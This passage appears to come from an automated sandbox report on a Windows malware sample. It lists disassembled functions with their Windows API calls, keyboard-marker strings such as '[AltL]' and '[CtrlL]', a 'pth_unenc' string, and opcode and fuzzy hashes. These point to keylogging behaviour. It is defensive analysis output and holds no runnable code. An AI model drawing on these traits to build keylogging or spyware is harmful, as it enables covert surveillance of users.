                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                        • String ID: [AltL]$[AltR]
                                        • API String ID: 2738857842-2658077756
                                        • Opcode ID: 0fd097a0a4b99d70b02a08e9004214b89ee8ccd3163f9cf7526c1a47b2b50f16
                                        • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                        • Opcode Fuzzy Hash: 0fd097a0a4b99d70b02a08e9004214b89ee8ccd3163f9cf7526c1a47b2b50f16
                                        • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                        Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00448835
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorFreeHeapLast_free
                                        • String ID: `@$`@
                                        • API String ID: 1353095263-20545824
                                        • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                        • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                        • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                        • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                        Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State
                                        • String ID: [CtrlL]$[CtrlR]
                                        • API String ID: 1649606143-2446555240
                                        • Opcode ID: 8f256fbae12a6d1972e20e0d193ff0540306bf2bf736503aba8af0ee0077a29a
                                        • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                        • Opcode Fuzzy Hash: 8f256fbae12a6d1972e20e0d193ff0540306bf2bf736503aba8af0ee0077a29a
                                        • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                        Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ObjectProcessSingleTerminateWait
                                        • String ID: pth_unenc
                                        • API String ID: 1872346434-4028850238
                                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                        Function 0044E0FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CommandLine
                                        • String ID: 8({
                                        • API String ID: 3253501508-1337158436
                                        • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                        • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                        • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                        • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                        Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                        • GetLastError.KERNEL32 ref: 0043FB12
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                        • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                        • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                        • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759